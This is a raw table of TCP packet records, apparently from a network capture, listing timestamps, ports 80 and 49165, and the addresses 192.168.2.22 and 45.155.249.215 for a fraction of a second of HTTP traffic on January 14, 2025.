Jan 14, 2025 16:21:10.188812971 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.188826084 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.188848972 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.188862085 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.188898087 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.188909054 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.188925028 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.188932896 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.188951969 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.188961983 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.188966036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.188977957 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189002991 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189014912 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189026117 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189037085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189052105 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189085007 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189121962 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189132929 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189138889 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189145088 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189208984 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189213991 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189244032 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189285040 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189296961 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189307928 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189321041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189333916 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189337015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189348936 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189352989 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.189378977 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.189389944 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.249967098 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.249986887 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250020027 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250032902 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250045061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250066996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250077963 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250086069 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250091076 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250102043 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250119925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250119925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250119925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250119925 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250130892 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250140905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250155926 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250174999 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250176907 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250188112 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250189066 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250200987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250217915 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250222921 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250245094 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250262022 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250261068 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250261068 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250273943 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250288010 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250308037 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250330925 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250341892 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250355005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250375032 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250392914 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250464916 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250474930 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250487089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250513077 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250513077 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250520945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250529051 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250540018 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250551939 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250557899 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250575066 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250586033 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250592947 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250601053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250612020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250627995 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250637054 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250649929 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250731945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250742912 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250754118 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250765085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250772953 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250777006 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250787020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250787973 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250804901 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250818014 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250818968 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250854015 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250857115 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.250865936 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.250896931 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251084089 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251096010 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251106977 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251117945 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251123905 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251132965 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251143932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251146078 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251156092 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251156092 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251167059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251167059 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251178980 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251187086 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251198053 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251214027 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251305103 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251324892 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251336098 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251342058 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251344919 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251368999 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251380920 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251391888 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251401901 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251404047 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251414061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251435995 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251435995 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251451015 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251475096 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251487017 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251513958 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251523018 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251559973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251579046 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251590967 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251599073 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251612902 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251625061 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251729012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251740932 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251751900 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251764059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.251771927 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251790047 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.251799107 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253137112 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253154993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253169060 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253175974 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253202915 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253293037 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253304005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253323078 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253331900 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253335953 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253350019 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253360033 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253379107 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253405094 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253416061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253427029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253438950 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253444910 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253467083 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253480911 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253606081 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253618002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253628969 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253639936 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253645897 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253650904 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253662109 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253675938 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253688097 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253717899 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253739119 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253756046 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253757000 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253767967 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253778934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253778934 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253791094 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.253792048 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253806114 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.253818989 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.265067101 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.279973030 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280117035 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280133963 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280139923 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280158043 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280167103 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280173063 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280184031 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280194044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280200005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280210018 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280222893 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280239105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280250072 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280256987 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280261040 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280271053 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280277967 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280287027 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280302048 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280313015 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280325890 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280366898 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280381918 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280395985 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280411005 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280425072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280427933 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280436993 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280440092 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280452967 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280457020 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280463934 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280477047 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280493021 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280497074 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280534983 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280610085 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280626059 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280641079 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280656099 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280659914 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280669928 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280670881 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280683041 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280685902 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280697107 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280702114 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280714035 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280715942 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.280724049 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280735016 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.280755043 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337074995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337160110 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337207079 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337215900 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337254047 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337254047 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337264061 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337291002 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337305069 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337332010 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337342978 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337378025 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337398052 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337416887 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337420940 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337452888 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337462902 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337487936 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337518930 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337526083 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337527990 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337569952 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337579012 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337615013 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337636948 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337650061 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337656021 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337697983 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337702036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337750912 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337752104 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337788105 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337798119 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337827921 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337840080 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337865114 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337874889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337901115 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.337910891 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337954998 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.337961912 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338005066 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338012934 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338054895 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338057995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338099957 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338112116 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338146925 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338165045 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338181973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338210106 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338217974 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338227034 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338259935 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338274956 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338310003 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338327885 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338342905 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338355064 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338388920 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338396072 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338432074 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338447094 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338478088 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338488102 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338536978 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338551998 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338603973 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338606119 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338644981 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338646889 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338680029 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338695049 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338718891 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338726044 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338752985 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338787079 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338797092 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338797092 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338820934 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338835955 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338857889 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338871002 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338896036 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338910103 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338932991 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338946104 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.338969946 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.338987112 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.339004993 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.339018106 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.339040995 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.339050055 CET	49165	80	192.168.2.22	45.155.249.215
Jan 14, 2025 16:21:10.339076996 CET	80	49165	45.155.249.215	192.168.2.22
Jan 14, 2025 16:21:10.339087963 CET	49165	80	192.168.2.22	45.155.249.215
